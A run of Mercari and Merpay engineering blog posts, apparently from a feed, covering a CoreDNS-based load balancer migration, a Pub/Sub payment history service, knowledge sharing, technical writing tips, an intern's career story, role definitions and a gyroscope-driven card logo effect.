; <<>> DiG 9.11.3 <<>> @KUBE_DNS_SERVICE_IP fast-secure-lb.public-mercari.jp
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8973
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 794e4f1d1cc49fc4 (echoed)
;; QUESTION SECTION:
;fast-secure-lb.public-mercari.jp.  IN  A

;; ANSWER SECTION:
fast-secure-lb.public-mercari.jp.   30 IN   A   203.0.113.0.10
fast-secure-lb.public-mercari.jp.   30 IN   A   203.0.113.0.11
fast-secure-lb.public-mercari.jp.   30 IN   A   203.0.113.0.12

;; Query time: 7 msec
;; SERVER: KUBE_DNS_SERVICE_IP:53(KUBE_DNS_SERVICE_IP)
;; WHEN: Wed Dec 22 23:18:41 UTC 2021
;; MSG SIZE  rcvd: 209

By proceeding with the gradual rollout for our weights, we managed to get 100% of the traffic migrated to fast-secure-lb in GKE without any downtime, impact or involvement from our developers. CoreDNS has been running in this configuration without any incident in our production for eight months until we decommissioned fast-secure-lb as it was no longer required in an east-west configuration.

Conclusion

In this article, we explained how we migrated fast-secure-lb, a critical component for the production traffic between our microservices running in the cloud in GCP and our monolith on-premises. We defined the problems aroused by the migration and investigated solving them in the most seamless way possible.

We understood that seamless migrations require a transparent approach using a hijack/man-in-the-middle approach, in our case with DNS rewriting to happen. By diving into the DNS internals of GCP and GKE, we found a way to replace the cluster DNS, kube-dns, with a powerful DNS server having the tools to make it work, CoreDNS, using stub domains. We then identified the limitations of Kubernetes DNS when it comes to gradual migration involving DNS domain change and integrated Cloud DNS powerful weighted-round-robin DNS policy to allow a safe and testable migration.

Finally, we shared how this seamless migration saved us hundreds of engineer time as we prevented 50+ services from being involved in it, motivating us to keep looking for seamless options when they exist in future migrations.

If you are interested in this work and would like to discuss it with me and my team, please don’t hesitate to apply or contact me on Linkedin / Twitter!

Tomorrow’s article will be by @hatappi from my team! Look forward to it!

Merpay Actionable History – Displaying Millions of Payments with Lightning Speed

Mon, 12 Dec 2022 12:00:00 GMT

This post is for Day 12 of Merpay Advent Calendar 2022, brought to you by Rory from the Merpay Payment Platform team.

Introduction

You might have noticed that we recently released Mercard for all of our customers. This was a great team achievement, but we also launched a range of other features at the same time to help promote its usage. One of these is what we call “Actionable History”.

Actionable History is a customers’ payment history that provides (you guessed it) actionable information for the customer to take. For example, should you make a payment with your Mercard, the payment will show up in your history and provide you with the opportunity to make the repayment for each transaction, whenever is convenient for you.

This provides more flexibility for our customers regarding their repayment schedule, and also helps provide more transparency for our customers regarding the payments they have made. Sounds like a win for everyone! This can’t be that hard to build, surely?

So, how to approach this technically?

When we think about showing payment history, often this is purely a static set of data that doesn’t provide any significant CTA (call-to-action). From a technical standpoint, this would typically mean that the largest technical challenge is to optimize for database read performance.

However, providing the convenience of quick repayments places a new technical constraint on our system – we need to be able to process, update and reflect state changes in payment events, without the customer navigating away from the screen. There’s also another latency requirement in that we want all payments to show up quickly (read: within a few seconds) after the payment itself is made. If a customer makes a large purchase with Merpay, and it takes >30 seconds to process, that could be a really poor experience. “Was the payment successful?”, “Should I try again?”, “Did I do something wrong?” would all be valid thoughts here, and all would reduce the trustworthiness of our platform. When dealing with customer money, that’s a no-go.

First and foremost, we need to be able to access payment data for our customers in order to be able to present it. In Mercari / Merpay, we widely adopt a microservice architecture (this has been discussed in many other posts, so I won’t elaborate here). Our services communicate via gRPC for synchronous requests, and Google Cloud Pub/Sub for asynchronous message passing. The data we require comes from a variety of different sources, so it makes sense to collect this data via asynchronous messaging.

It would then be sensible to assume that we receive all of this data from our sources, throw it into a database, and then return it from a gRPC request, right?

Ah, dear reader… I, too, yearn for a world where technical problems require only simple solutions. The eagle-eyed among you will notice that many of these transaction types are not mutually exclusive. The Mercard is a credit card, after all, and thus can be classified as a deferred payment. You may have even used Mercard to purchase something on Mercari, and so there are (at least three) different areas of this transaction. I regret to say this is still a rather large simplification.

So, there is a natural linking between related payment types, which presents another challenge: What if one event is received before another unexpectedly? What if we receive a Mercard payment which claims to be for a Mercari item, but we haven’t yet received any information on the Mercari purchase itself?

Yes – The natural order of received events matters. If this were a conference talk, I would leave a dramatic pause at this point, to allow time for gasps from the audience.

A hierarchy of events

This means that the events that we receive must fall into a certain hierarchy in order for us to be able to process them correctly. This naturally forms a tree structure. For this, we need a way to be able to control the flow of events, and be able to place events into a “temporary storage” in the situation that we are waiting on some follow up information.

One question you may have here is “why can’t you store partial data in the database, and just immediately accept all events”? Which is a great observation, and certainly a goal to strive towards. However, let’s consider each event received as a state transition for a payment; if we allow all events at any time to be received and processed, the number of state transitions for a payment explodes exponentially. It would most likely result in fried developers, fried servers and sad customers. So, we enforce a common path for each transaction type. That is, we should accept payments to be received in a certain order. Next, we need to find a way to achieve this technically.

Nack nack, who’s there?

The solution to this is to process all events that we receive into a common mold, and put these into another message queue which allows us to control the order of the events.

By using an internal message queue, this provides us with an opportunity to be able to acknowledge an event negatively (otherwise known as “nack”), to put a message back into the queue if we are not ready to process the event.

This provides us with the ability to delay processing of certain messages while we wait for others to be received. Often, this takes place over the course of milliseconds, and so does not provide a significant amount of latency for our customers.

This is all well and good, and seemingly provides us more control over processing historical payment data, but after some time (and much confusion) we learned of the following rules:

The text from the image reads:

The ack deadline is for the whole batch of messages, NOT for each message.
Acked messages will be redelivered if they belong to the same batch as expired (and maybe also nacked) messages
Duplicate messages generate new duplicate messages.

To me, at least, this reads a little bit like a religious commandment, or an old English legal text:

“Thou shalt respect the delivery decrees of Pub/Sub”

Fundamentally, for a service which depends on the ability to nack messages in order to be able to deterministically process events in a given order, this has the potential to cause a lot of trouble with our message processing latency due to the generated duplicates from Pub/Sub.

For example, let’s assume that we consume messages in a batch of 10, with a 10% likelihood of nacking a single message in a batch. This would mean that on average, 10% of events are redelivered, with 9% being duplicates (as being part of a nacked batch). Then, if we need to process 1 million messages in 1 hour, then actually 100,000 of these will be retried and will fill the queue even further!

Thankfully, across Merpay we heavily utilize idempotency across our services, so duplicate messages will be acknowledged and discarded without issue, but the largest negative side effect of this is that our Pub/Sub queue can easily become “backfilled” with duplicate messages.

At this point in the article, it would be fantastic to say that we found a silver bullet solution, and everything was resolved without issue. But, in the real world I can only say that our solution to this involved taking a really deep dive into our use case, tweaking Pub/Sub configurations, tweaking Kubernetes configurations, and staring at monitoring dashboards for long periods of time. We have, however, reached a state with the service where we are currently happy with the performance, and our customers can rely on us to show us their payment history data in a timely manner.

What did we learn?

I’m certainly proud of what we’ve been able to achieve with the history service, but there’s a few things that I would tell myself, if I could go back in time and provide some advice to past-me. These would be:

If you are using an API in a slightly non-standard way (for example, leaning on the nack functionality of Pub/Sub), do thorough research to ensure that this won’t cause trouble further down the road.
- It’s not necessarily a bad thing to bend the rules of what you can achieve with the tools you are given, but this does mean that more background research is required!
- Furthermore, it can be valuable to plan alternate technical architectures in case larger blockers emerge (thankfully not required from us this time!).
When designing a new service, try to walk through the most common customer journeys / request patterns first. How will the service interact with dependencies? What will be the hottest database tables and columns? What kind of back-of-envelope estimate can we provide for latency at this point in time?
- The payment history service is a platform service after all, and therefore is quite deep into our service map. Even so, understanding the customer journeys and use-cases can provide really useful insights in terms of designing a performant and stable service.
Utilize your cloud service provider support technicians! We had some really productive conversations with GCP support which greatly helped us improve our service performance, but we definitely could have had these conversations even sooner.

What’s next?

As an immediate (and concrete) next action, we were thrilled to find out that GCP have recently made “exactly-once delivery” generally available for Pub/Sub. We’ll definitely be investigating this as a possible future performance improvement!

On a more long-term scale, as is the case with any kind of service development, the goalposts are always a moving target. Therefore, we always have new features, improvements and bug-fixes that we are working on. We’re proud of working on this small piece of Merpay functionality and we hope that you enjoy using it.

Tomorrow’s article will be by 1000ch. We hope that you are looking forward to it!

Knowledge sharing problems and practices

Sun, 11 Dec 2022 12:00:05 GMT

This post is for Day 11 of Merpay Advent Calendar 2022, brought to you by @resotto from the Payment Platform Balance team.

The purpose of this post

Basically, knowledge sharing is to share knowledge acquired by someone with others. In business, acquiring knowledge faster is crucial for us to create something, gain profit, solve problems, obey the law/guidelines and work smart.

Generally speaking, knowledge sharing problems should mean the situation where someone who hasn’t known one specific knowledge suffers a loss. In the context of software engineering, the problems can be more granular than it.

In this post, I’d like to show what we did for knowledge sharing problems but they might also be applicable not only to software engineering but also to other areas.

The purpose of this post is to give readers an opportunity to think about knowledge sharing problems.

Notice: In this post, the term knowledge equals knowledge of a domain in the context of Domain-Driven Design.

Why I started thinking about knowledge sharing

Merpay Balance team has two major problems about knowledge sharing:

Since team members have usually asked questions to someone who knows the knowledge well, knowledge has depended on the person.
There is a psychological barrier to responding to inquiries or incidents for the system which is “black box” for someone.

The psychological barrier was found as a result of discussions in a team retrospective where all members agreed with the difficulty of fixing and/or maintaining the “black box” systems.

Additionally, some members have left our team and some members have joined our team recently.

So, the above problems have become more serious for our team.

That’s why I started thinking about a way to improve the team knowledge sharing mechanism.

Status Quo

Let me summarize the current situation of our team in terms of knowledge sharing here.

Certain team members have less knowledge about APIs and/or functions which they haven’t engaged at all than others.
Members have created and/or updated documents at any given time except for ones required for projects like Design Doc.
Team members think the current situation isn’t too bad since the number of documents isn’t low and there aren’t many outdated documents.

We haven’t had any specific urgent/critical problems for knowledge sharing. However, when we considered the risks of the situation where nobody in our team can handle any incidents at any time, team members also started thinking about the problem more seriously and voluntary members launched a small community for the problem.

The following contents are the result of discussions in the community.

Analysis of the problem

At first, the members of the community considered the following topics:

What kinds of ways of acquiring knowledge exist and their characteristics?
Where do knowledge sharing problems exist?

I’ll explain them respectively.

What kinds of ways of acquiring knowledge exist and their characteristics?

We can acquire knowledge by different means. Here are the ones we discussed.

Before jumping into those details, let me clarify the difference between “documents” and “logs”.

“documents” means organized knowledge
“logs” means unorganized knowledge such as meeting minutes, Slack posts etc…

The most straightforward way is asking questions. Respondents of each question should execute a context switch from their current work.

Documents always help us. It’s also easy to search by keywords but it takes time to create/maintain them. Unless we create it, we can’t refer to it.

Slack messages are like treasures of information (meeting minutes as well). It complements documents a lot. Though it’s helpful, we need to identify the target knowledge from noises.

I check the recordings of meetings to review the exact contexts that happened in the meeting. If someone who didn’t attend the meeting tries to check something, it would require more time.

Lastly, reading application codes is a good (or the best) way to acquire knowledge. Code comments help us to understand the behavior quickly. If test codes are written as Test-Driven Development, reading each test case is also helpful. The more prior knowledge we have, the faster we can read codes.

Where do knowledge sharing problems exist?

Next, we discussed our actual inquiry / incident handling process. There have been two patterns for it in our team.

The above pattern is the one where the responder keeps investigations and completes the tasks.

This process is ideal since the knowledge required to complete the tasks should be shared afterwards. Unfortunately, we think intuitively this pattern has accounted for only 30% of the total. The rest is pattern 2 below.

In this pattern, the responder delegates tasks to someone who knows it well or has experienced it before.

If we need to investigate something in detail, this pattern usually emerges consequently.

After visualizing each step of inquiry / incident handling processes, we discussed where knowledge sharing problems exist with the figures.

The following two figures extract each step of the upper layer in pattern 1 and each step of the lower layer in pattern 2 separately.

For some steps of the upper layer in pattern 1, we identified three knowledge sharing problems.

Only limited members can respond to inquiries / incidents.
Knowledge couldn’t be found properly.
There is pressure to write documents perfectly.

We also identified that not being good at utilizing debugging tools contributes to the psychological barrier to responding to inquiries / incidents. This isn’t directly correlated to knowledge sharing problems but it’s worth keeping in mind.

For the lower layer in pattern 2, we identified that the knowledge becomes depending on the person.

Practices

We figured out where knowledge sharing problems exist now. In this section, I’ll explain what we did for those problems.

GitHub issue

First, we introduced the random member assignment mechanism with GitHub issues. With GitHub Actions, we can assign 2 team members randomly when a GitHub issue is created.

We’ve proactively asked someone who will request/report something to our team to create GitHub issues. In addition, we sometimes create GitHub issues by ourselves intentionally when we want to assign members randomly.

We’ve also proceeded with documentations for regular operations and shared their workloads by assigning members randomly (via GitHub issues).

Slack reacji-channeler

I tried one different approach. I created one Slack channel dedicated to knowledge sharing and set a mechanism with Slack reacji-channeler where the specific Slack stamp left on a Slack post will send the post to the channel. Then, I left the stamps to many beneficial Slack posts regardless of where the post exists.

In this way, I collected lots of knowledge into that Slack channel and shared the channel to team members.

When I post some explanations for something or how to resolve a problem, I also leave the Slack stamp on it currently. Team members can check the channel whenever they want to explore beneficial information.

This channel still doesn’t have any solid use cases for knowledge sharing but the culture of leaving the Slack stamp still remains.

Google Doc

I thought we shouldn’t miss the value of existing documents and in fact, there were many documents which I haven’t read yet. So, I tried to list up the main documents, read them one by one and created one large Google Doc including those contents.

As a result, I read 29 documents and the contents of the Google Doc grows up to 32 pages where almost all knowledge shared by documents is covered (in detail!).

I took care of the only one point when creating such a document:

DON’T STICK TO THE FORMAT

I knew I would read many documents and there should be duplicate and/or crossover knowledge in the middle of reading so I didn’t take care of the format at all. When adding duplicate or crossover knowledge, I searched it first (if possible) and grouped it together loosely.

What I did in terms of its format is just adding Heading 1 section. Those headings separated the contents beautifully. That was enough for the purpose.

Formatting the document would be better only after the content is almost fixed.

One of the useful features of Google Doc is bookmark. I put bookmarks on some topics which can be referred to by multiple places/contexts. Bookmark contributes to connecting related knowledge together in the Google Doc.

Application code

After reading those documents, I understood which knowledge is important. Then, I listed the source files where important knowledge is located and suggested to team members that we should read them together. I also suggested making the memo of their understanding public in the Google Doc.

This pretty worked for us since we could focus on reading self-assigned source files and also understand other knowledge by reading memos created by other members.

Knowledge Index

There is one ongoing practice. That is creating a knowledge index.

Knowledge index has been mentioned in the context of knowledge search. Unless we know the keyword of the knowledge, we can’t search for it. In order to know what kinds of knowledge keywords exist, we keep creating a knowledge index.

We utilize FigJam for creating a knowledge index since knowledge will be added/updated many times and doing them frequently on a document or a spreadsheet can be exhausting.

Knowledge sharing meetup

One of the community members set up the opportunity to ask many questions to the tech lead of our team as a “knowledge sharing meetup”. That direct approach worked much as well.

We’ll keep conducting knowledge sharing meetups. After creating a knowledge index, we can prioritize knowledge and someone who knows it the best can share the knowledge in the meetup.

Next presenter of the meetup is me but I won’t prepare at all. If preparation for the meetup is mandatory, it will be difficult for us to keep them.

I’ll try not to forget recording the meeting and also share the knowledge on the dedicated Google Doc for sure.

We did a lot of countermeasures for knowledge sharing problems. In the next section, let us recap the results of these actions.

Results

The result was more than expected.

With documents for regular operations, we could share the operation and its knowledge, which has depended on someone before.
I succeeded at summarizing many beneficial Slack posts into one Slack channel (though its use is under experiment).
Creating one large Google Doc makes us understand the knowledge comprehensively, search the knowledge easily, and ask questions easily.

Consequently, we found that the Google Doc can be one of knowledge sharing platforms where knowledge converges organically and is shared by someone seamlessly, and anyone can deepen their understanding by leaving/answering questions. That is much more than documentation.

Fabulous!
At the same time, I tried considering the prerequisites of the above results.

Discussion

Disclaimer: These discussions are just my thoughts. I want to discuss this topic in the community later.

I thought there was at least one factor that contributed to the above results. Yes, Psychological safety.

What if one of the team members feels fear, anxiety or rejection when asking questions to other members? These situations would obviously block the acceleration of knowledge sharing.

What if some of the team members don’t share their knowledge which depends on them? Even if we were in this situation, we could proceed with knowledge sharing by creating one Google Doc and summarizing knowledge into it.

Conclusions

Here are conclusions of our knowledge sharing activities.

Documentation is high cost / high scalable

Although creating documents takes time, once we have done it, everybody can catch the knowledge.

Making someone’s memo of understanding public scales

Even if you understand the knowledge partially, making the memo of understanding public and leaving questions on it leads to better understanding of anyone else (and luckily someone may answer it!).

Other members can save time to understand the knowledge by reading the memo so that much time will be saved in total.

The way of sharing knowledge without documentation

Now, we know the scalable way of sharing knowledge with documentation described so far.

We have also explored the way of sharing knowledge without documentation (like collecting beneficial Slack posts into one Slack channel mentioned earlier) and we’ll keep exploring it.

Since there are many beneficial posts in Slack, communication tools and knowledge sharing platforms would be united ideally. Machine learning would contribute to collecting related information and organizing them in a natural way on the tool.

When it comes to reality, most knowledge sharing problems will be solved.

Thanks for reading this post!

Next article will be brought by @rory who is also from the Payment Platform team.
Please check it out!

Ten Tips to Improve Your Technical Writing

Sun, 11 Dec 2022 11:00:41 GMT

I’m @rey, the technical writer for Platform Engineering (SRE, Infra, Data, & Client) at Mercari. This post is for Day 11 of Mercari’s 2022 Advent Calendar series. You may have seen my colleague @josh’s blog post on personal knowledge management, wherein he outlined the benefits and methods of organizing, retrieving, and applying knowledge. This post focuses on recording knowledge, that is, writing! Here, I would like to quickly present you with some ideas — from myself and some others — that may help you become more comfortable with writing habitually and effectively.

Try to say it in less.

It’s a beautiful thing, the destruction of words.
— George Orwell
In the drafting process, try writing the introduction last.

The traveler sees what he sees. The tourist sees what he has come to see.
— G.K. Chesterton
Like in school, put your name and the date on your documents.

Education is what remains after one has forgotten what one has learned in school.
— Albert Einstein
Multiple rewrites usually indicate a fundamental misalignment. Better to clarify what you are trying to express, and to whom, and then starting over.

Too large a revision, or too many revisions, indicate that the piece of writing is a failure. In the time it would take to salvage such a failure, I could write a new piece altogether and have infinitely more fun in the process.
— Isaac Asimov
Don’t think of it that you “write documentation.” You write statements (sentences) that convey ideas (paragraphs) that when taken together (sections) form a conception (thesis); documentation arises as a byproduct of this effort.

All you have to do is write one true sentence. Write the truest sentence that you know.
— Ernest Hemingway
Writing is not a big deal, and the worst that could happen is you have to rewrite everything — which is not so bad, since writing is not a big deal.

There is no such thing as a lousy job – only lousy men who don’t care to do it.
— Ayn Rand
What you wrote, for the most part, is neither as good nor as bad as you or others may say. It is, however, exactly as important or as unimportant as you think.

There is nothing either good or bad but thinking makes it so.
— William Shakespeare
In order of importance, a document should be: published, correct, and beautiful.

The finest eloquence is that which gets things done and the worst is that which delays them.
— David Llyod George
Typos and solecisms are the least of your concerns.

To play a wrong note is insignificant; to play without passion is inexcusable.
— Ludvig Van Beethoven
Approach your practice of writing with exuberance, mindfulness, and humility. Respect the time and attention of your readers, be gracious when peers seek feedback or counsel, and cherish your voice.

Be yourself; everyone else is already taken.
— Oscar Wilde

Before closing, I’d like to zoom out from composing and looking at the document lifecycle overall. I frequently find parallels between the natural world and documentation. The featured image for this article is a Plumeria in bloom that I cared for back in the States. Yet as the blossom inevitably fades, so too do documents lose accuracy and relevance. Sometimes, it is not wise to try and maintain documentation beyond a certain point. Rather, you may find it more fruitful to cultivate the culture and mechanisms that bore the original documentation, and thereby ensure that it may bear the next.

Over the holiday and year-end season, I hope you find time to relax, enjoy good company, and perhaps think a little about writing. Better documentation makes the world better. I envy the delight of your readers as they get the answers they need and expand their knowledge with the great content that I know you can write. As they say in Mercari, Go Bold!

Tomorrow’s article, for the 12th day of Mercari Advent Calendar will be by @yaginuuun from the Recommendation team. Please look forward to it!

My journey from an SWE Intern at Mercari JP to SWE at Mercari India

Sat, 10 Dec 2022 11:00:36 GMT

Introduction

This post is for Day 10 of Mercari Advent Calendar 2022, brought to you by Vaibhav Jain.
I joined Mercari Japan last year as a Software Engineer Intern and currently working as a Software Engineer at Mercari India. In this article, I will walk you through my transition from Intern at Japan Office to Full-time at India office. Also, I will be going through my journey so far at Mercari India. You can check out my Internship Experience here.
I had been through different phases in my journey with Mercari. Initially, I was interning at Mercari JP from August ’21 to December ’21, then I rejoined Mercari JP as a subcontractor from the month of April ’22 to July ’22. After that I joined Mercari India as a Full-time Software Engineer from August ’22. And the best and only constant part of all these phases was my team.

Transition Phase

Life is easier when you are an intern, but as you transition into a full-time employee, things start to get more serious. There is a big difference between being an Intern/Subcontractor and a Full-time employee. Let me take you through my transition phase.

Work

The first big change was the nature of my work. As an intern, mostly I worked on small tickets like bugs/minor improvements. I took some big tickets as well like the implementation of a local database in the Android application and working on the features related to the filters on the search screen.The workload was still low and got a lot of help from my mentor, Abhinav Joshi. He used to assign me the tickets, explain to me them in detail and also used to guide me on how/who to approach.
But once I transitioned to being a full-time employee, the amount of work increased. I started to take on more work, discussions withPM, engineering managers (EMs) and QAs. You can always ask for help but there is no spoon-feeding.

Performance Evaluation and OKRs

When you are an intern, you don’t have to worry about any OKRs or self assessment because there is none for interns. You can always ask for casual feedback from your Manager/Mentor but there is no performance evaluation for interns.
But as soon as you become a full-time employee, you have OKRs to work upon, you have to write a self-assessment after each quarter and you also have a performance evaluation semi-annually. For me, these were very helpful because they gave me a direction to work and now I could channel my energy & time in the right direction.

Relocation

I did my internship remotely from India so I was not able to experience the office culture.
When I joined Mercari India, I relocated to Bengaluru, India. It was the first time I worked from the office because all of my internships were during the COVID’19 period only. It was an amazing experience to work from the office, meeting new people and networking with them.
Overall, my transition experience was pretty smooth both in terms of work and place, all thanks to Mohan Bhatkar, Jatin Kumar, Mikako-san, Onboarding Team at Mercari India and my Manager. Also, big shoutout to my manager Stephan Donin. He made sure that my transition was a cakewalk.

Experience at Mercari India

In terms of work, I was still part of the same team as when I was an intern. Although there was not much difference, I was missing the in-person collaboration with my team.
The one thing I was missing during my internship was in-person lunches/dinners. Here we have a lot of team lunches/dinners with other members of Mercari India {add some photos}. I really enjoyed each one of them, interacting and networking with people from Tokyo Office as well.
I have been part of many different events that have happened in the Mercari India office.

Golang Bangalore – Attended my first-ever in-person conference. It was a really nice experience getting acquainted with Go language. Also, after the talks, we had a networking session with all the attendees and it was very informative.
Bangalore Visit – Anand (Backend Engineer), Kentan-san(Engineering Manager) and I visited various places in Bangalore including ISKCON Temple, Bangalore Palace, Cubbon Park and Vidhan Sabha (Parliament House). It was a really nice outing.
Japan Day – We went to IIT Hyderabad for Japan Day 2022. It was a fabulous experience knowing and interacting with people from different Japanese companies and talking with students from IIT Hyderabad. We even had friendly badminton and table tennis matches with the IIT Hyderabad sports team.
Mercari Hiring Drive – We had a hiring drive for new grads in Bangalore. It was also really fun interacting with students and sharing my internship experience.
Furniture Shopping at IKEA – We also went to IKEA Bangalore for some furniture shopping for the India Office. It was my first time going to an IKEA.
Diwali Celebration – Since Diwali is a very special and grand festival of India, we had to do something in the office as well. We had a Diwali Party in the office where we all were dressed in traditional attires. We played some games and had an amazing lunch (not the usual lunch).
HackFest – We also celebrated Hackfest in the India Office, and some members from Mercari India also participated in Hackfest.

Conclusion

My internship experience was pretty amazing and I got to learn many new things as a person and a software engineer. It set a benchmark in my mind on what to expect as a full-time software engineer. After I got converted to a full-time engineer, the experience from the internship really helped me to get used to the new challenges. Currently, I am having a very good time at Mercari India. Lots of new experiences like meeting and networking with people from Mercari India and Mercari JP, having a lot of discussions at team dinners and exploring around Bangalore as well. The last 4 months have been amazing for me and I hope to have a good experience in the future as well !!

PS: I completed one year being a part of Mercari this November. Cheers!!

Tomorrow’s article, for the 11th day of Mercari Advent Calendar will be by rey. Please look forward to it!

The importance of role definitions in an organization

Fri, 09 Dec 2022 11:00:24 GMT

This post is for Day 9 of Mercari Advent Calendar 2022, brought to you by @stouf from the Mercari Personalization Core team.

Whether you are aware of it or not, you are probably familiar with the concept of role. You have probably used terms such as “CEO” or “Customer Support” countless times. One problem with roles is that, although we all use the same terms, we do not necessarily all have the same understanding of what they imply. It can lead to situations where a deep misunderstanding goes unnoticed for a little while, leading to unwanted results.
With this article, I will go through the risks of misalignments borned from different understanding of the same roles, how we define roles at Mercari and the challenges that come with that effort.

The risks with being misaligned on role definitions

Let us start by going over the problems with not having a clear definition of the roles in your organization

Having a different understanding of given roles means that there could be misalignments in terms of expectations in your organization. Although having clear expectations towards each other is a powerful tool for managing efforts, having unclear expectations, on the contrary, can be a true recipe for disaster. The last thing you want is a situation where no one is taking actions to solve a given problem because everyone thinks it is someone else’s responsibility to do so. Having unclear expectations can create considerable delays in your operations, and can also create conflicts and frictions among the members of your organization, which will eventually affect the morale of your teams.

Another risk is destabilizing newcomers. Even if you managed to perfectly define the roles in your organization, those role definitions are very likely to be different from the role definitions of other organizations. Without a clear definition of your roles, newcomers are very likely to join the organization with their own interpretation of their role and may be surprised, if not disappointed, after realizing that their interpretation is different from the reality. Onboarding is a critical step for any newcomer, and not having clear role definitions is a potential friction to that important process.

Misalignment can also impact members of the organization looking into transitioning to another role. A role transition can be an important step in someone’s career; it is usually not a decision taken lightly and requires considering many factors. One of those factors is the expectations associated with the potentially new role. Not having a clear definition of roles adds a lot of uncertainty to people looking into transitioning. Even worse: realizing after transitioning to a new role that the expectations are different than what you thought could be an extremely bitter experience.

How we define roles at Mercari

Now that we covered the risks of not having clear role definitions, let us see how we define roles at Mercari.

We obviously start with people occupying the target roles. We ask them what they think the expectations associated with their role are. We also make sure to reach out to a vast diversity of people to maximize our chances of covering all the expectations associated with the targeted roles.
We also ask the opinions of people working with those occupying the target roles. Those people may bring up elements that those occupying the target roles would not think about. Here too, the goal is to capture the widest possible range of opinions and maximize the accuracy of our role definition.

Finally, probably the most important part of this process: making it an iterative process with living documentation. Your organization will evolve over time, so will your roles and the associated expectations. Therefore, it is important to keep assessing the accuracy of your role definitions continuously.

At Mercari, we do that by making our role definitions open to everyone in the organization and by making it possible for anyone to propose amendments. More concretely speaking, our role definitions live in a GitHub repository and everyone in the organization can access it, raise issues or submit pull requests.
A task force worked on creating a first definition for a few roles and spread awareness of those through the organization, mentioning that they are open to discussions and contributions.

The challenges

All this obviously comes with its set of challenges. The biggest one for us was engagement. As mentioned above, everyone has their own interpretation of their role. As such, not everyone feels directly concerned by the importance of having an explicit definition of the role they occupy.

In most cases, people are aligned enough so they can carry out their duty without encountering significant friction. As a consequence, for most people, reading a definition of their role feels like investing time into reading something they already know about, which significantly impacts their motivation to contribute to the effort.
Similarly, those who originally joined the organization with different expectations were very likely able to realign themselves despite the friction and may not feel concerned by the effort either.

To address that, we tried something very simple: we sent requests for comments throughout the entire organization. Unfortunately, the response rate was below our expectations. It confirmed that people are not likely to contribute to an initiative unless they feel concerned by the problems it tries to address.
Reflecting on all that, we eventually came to the conclusion that role definition documents may simply not be documents with a high level of engagement. In the end, they are only needed in specific situations such as newcomers joining the organization, someone considering a transition to a new role or clarifying expectations in terms of responsibilities.
Based on all that, we believe that referencing role definition documents in relevant places such as onboarding documents or documents about promotions should give them the right amount of exposure they actually need.

Wrap-up

With this article, I explained how important it is to have clearly defined roles when it comes to aligning expectations within an organization. Not having clear role definitions may impact members of the organization on their day-to-day activities, but may also impact the onboarding of newcomers and people transitioning into a new role.
Keeping role definitions updated as the organization evolves is critical. For that, at Mercari we have made our role definitions internally open for both reading and amendment.
Role definition documents are by nature not consulted on a daily basis and it can be easy to forget about them. That is why it is important to make sure they are being referenced in places where they are relevant.

Tomorrow’s article, for the 10th day of Mercari Advent Calendar will be by vaibhav.jain. Please look forward to it!

Mimicking a Holographic Effect for Mercard

Thu, 08 Dec 2022 12:00:48 GMT

Hi! We’re Kris and Mikael from the Merpay iOS team, and anzai(@off2white) and shinmiy (@shinmiy) from the Merpay Android team.

This post is for Day 8 of the Merpay Advent Calendar 2022: Mercard Behind the Scenes.

The Holographic Effect for Mercard

Mercard is a new physical credit card from Merpay released just last month that integrates into your smartphone to provide an extra layer of safety and convenience when it comes to managing your spending. Since our users can access their card from within the Mercari app, we wanted to provide a premium experience for the card UI by reproducing the same holographic logo found on the physical card but in digital form. Conventional approaches such as simple PNGs or Lottie animations proved insufficient in recreating the effect, so we opted to instead utilize the gyroscope sensor to map the device’s orientation to the logo color to mimic light reflections bouncing off the physical card when rotating it. Here’s a behind-the-scenes look of how we recreated the Mercard logo in the app.

https://storage.googleapis.com/prd-engineering-asset/2022/12/7f5cd2da-mercard_card_hologram.mp4

Recreating the Hologram using the Gyroscope Sensor

To recreate the hologram in the app the gyroscope sensor is first used to gather data about the device orientation, mapping it to a color gradient from an HSB color circle. This gradient then gets masked by the icon to make it appear that the icon itself is reflecting the colors.

Created hologram logo by motion data flow [1]

[1]: Apple Developer : Getting Raw Gyroscope Events (https://developer.apple.com/documentation/coremotion/getting_raw_gyroscope_events)

The Gyroscope

The gyroscope sensor can measure, in real time, the device position relative to the 3 spatial axes. When the user rotates their device we can measure exactly how the rotation looks in 3D space and send that data to the next stage for color selection. From these readings we can choose the colors and create a gradient color to place over the icon.

Hue Colors

In expressing the color gradation, we needed to determine the color of the icon from the device position. Using an HSB color circle turned out to be the best option for us. We converted the angles of the three axes into an angle between 0 and 360 degrees and mapped this to the current center color.

Planning

The development started as an idea pitch from designers, but it was set aside in favor of other tasks (spoiler alert: there’s a LOT to get done when launching a new credit card!). But as two very talented interns joined the iOS and Android teams shortly after, it just so happened that this type of short-term, independent task was the perfect project for an internship. Asami Kubota and Cai Wenxi were tasked with developing a proof of concept, and they delivered perfectly.

We gathered around and discussed how we can utilize the device rotation sensors and manipulate the icon colors by changing the hue and saturation in relation to the device posture. It didn’t take long to conclude that the idea was feasible and could be implemented shortly after the initial launch. A project team was formed as the idea turned into a full feature project, being a joint effort between designers, engineers, and PMs.

Screenshot of an initial PoC

Once the project got started, we tried various patterns to see what looked and felt natural, emulating the holographic logo on the physical card yet still making sure it blended in with the other UI elements displayed on the screen. The team came up with multiple iterations of the icon and tested them on actual devices (we may have gotten some weird looks from other teams during this process, with everyone twisting their arms and neck to look at their device from different angles).

Multiple variables were considered along the way, such as the color scheme, sensitivity of the device, and hue and saturation limits. Sliders were added to the builds so that the designers were able to see how each variable contributed to the overall feel.

Sliders to check for various parameters

We eventually settled with a final product, and ported the implementation from the PoC to our production app.

Energy efficiency

One of the main concerns when implementing a visual effect in Mercari app is that we want to avoid any negative side effects, such as having a device overheat or simply drain the battery faster than normal.

In order to avoid those issues, we addressed the different issues separately.

Motion Monitoring Setup

As previously mentioned, this new feature uses the motion monitoring feature of iOS. This allows us to extract the position of the device in real time, however, if done too aggressively it can use a lot of power.

We tried many different configurations in order to assess which one was the best balance between power consumption and animation smoothness, and ended up setting the data collection frequency to 60 fps. We were also careful to follow Apple’s recommendations by creating a unique instance of the Motion Manager to avoid any data collection issues.

Low Power Mode

On iOS it’s possible to monitor the device’s power mode to know if the user is trying to conserve battery or not.

Low power mode setting

